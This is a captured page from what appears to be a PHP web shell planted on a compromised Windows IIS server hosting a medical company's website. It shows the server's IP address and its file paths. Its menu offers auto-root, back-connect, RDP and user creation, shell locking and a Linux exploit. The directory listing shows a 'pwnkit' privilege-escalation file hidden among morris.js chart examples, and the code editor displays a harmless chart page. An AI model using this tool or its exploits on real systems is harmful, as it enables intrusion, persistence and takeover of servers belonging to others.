Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.145.180.133
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
morris.js /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
_template.html
708
B
-rw-rw-rw-
area-as-line.html
1
KB
-rw-rw-rw-
area.html
1.07
KB
-rw-rw-rw-
bar-colors.html
1.22
KB
-rw-rw-rw-
bar-no-axes.html
1001
B
-rw-rw-rw-
bar.html
1.02
KB
-rw-rw-rw-
days.html
1.52
KB
-rw-rw-rw-
decimal-custom-hover.html
1.16
KB
-rw-rw-rw-
diagonal-xlabels-bar.html
1.55
KB
-rw-rw-rw-
diagonal-xlabels.html
1.54
KB
-rw-rw-rw-
donut-colors.html
1.09
KB
-rw-rw-rw-
donut-formatter.html
1.04
KB
-rw-rw-rw-
donut.html
997
B
-rw-rw-rw-
dst.html
1.01
KB
-rw-rw-rw-
events.html
2.45
KB
-rw-rw-rw-
goals.html
1006
B
-rw-rw-rw-
months-no-smooth.html
1.51
KB
-rw-rw-rw-
negative.html
1.16
KB
-rw-rw-rw-
no-grid.html
1.53
KB
-rw-rw-rw-
non-continuous.html
1.74
KB
-rw-rw-rw-
non-date.html
1.19
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
quarters.html
2.47
KB
-rw-rw-rw-
resize.html
1.61
KB
-rw-rw-rw-
stacked_bars.html
1011
B
-rw-rw-rw-
timestamps.html
1.59
KB
-rw-rw-rw-
updating.html
1.34
KB
-rw-rw-rw-
weeks.html
2.42
KB
-rw-rw-rw-
years.html
1.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : negative.html
<!doctype html> <head> <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/raphael/2.1.2/raphael-min.js"></script> <script src="../morris.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.js"></script> <script src="lib/example.js"></script> <link rel="stylesheet" href="lib/example.css"> <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.css"> <link rel="stylesheet" href="../morris.css"> </head> <body> <h1>Negative values</h1> <div id="graph"></div> <pre id="code" class="prettyprint linenums"> var neg_data = [ {"period": "2011-08-12", "a": 100}, {"period": "2011-03-03", "a": 75}, {"period": "2010-08-08", "a": 50}, {"period": "2010-05-10", "a": 25}, {"period": "2010-03-14", "a": 0}, {"period": "2010-01-10", "a": -25}, {"period": "2009-12-10", "a": -50}, {"period": "2009-10-07", "a": -75}, {"period": "2009-09-25", "a": -100} ]; Morris.Line({ element: 'graph', data: neg_data, xkey: 'period', ykeys: ['a'], labels: ['Series A'], units: '%' }); </pre> </body>
Close